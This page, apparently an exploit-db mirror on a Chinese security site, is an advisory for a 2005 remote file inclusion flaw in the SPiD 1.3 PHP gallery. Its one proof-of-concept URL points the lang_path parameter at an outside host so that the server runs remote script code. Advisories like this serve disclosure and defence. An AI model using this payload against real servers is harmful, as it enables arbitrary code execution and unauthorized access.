Spid 1.3 – ‘lang_path’ File Inclusion

Spid 1.3 – ‘lang_path’ File Inclusion

漏洞ID 1055243 漏洞类型
发布时间 2005-07-11 更新时间 2005-07-11
图片[1]-Spid 1.3 – ‘lang_path’ File Inclusion-安全小百科CVE编号 N/A
图片[2]-Spid 1.3 – ‘lang_path’ File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25959
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14208/info

SPiD is a gallery management application written in PHP.

SPiD is prone to a remote file include vulnerability, due to lack of validation of user input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/SPiD/lang/lang.php?lang_path=http://www.example.com

相关推荐: Samba Improperly Terminated Struct Buffer Overflow Vulnerability

Samba Improperly Terminated Struct Buffer Overflow Vulnerability 漏洞ID 1101615 漏洞类型 Boundary Condition Error 发布时间 2002-08-28 更新时间 2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享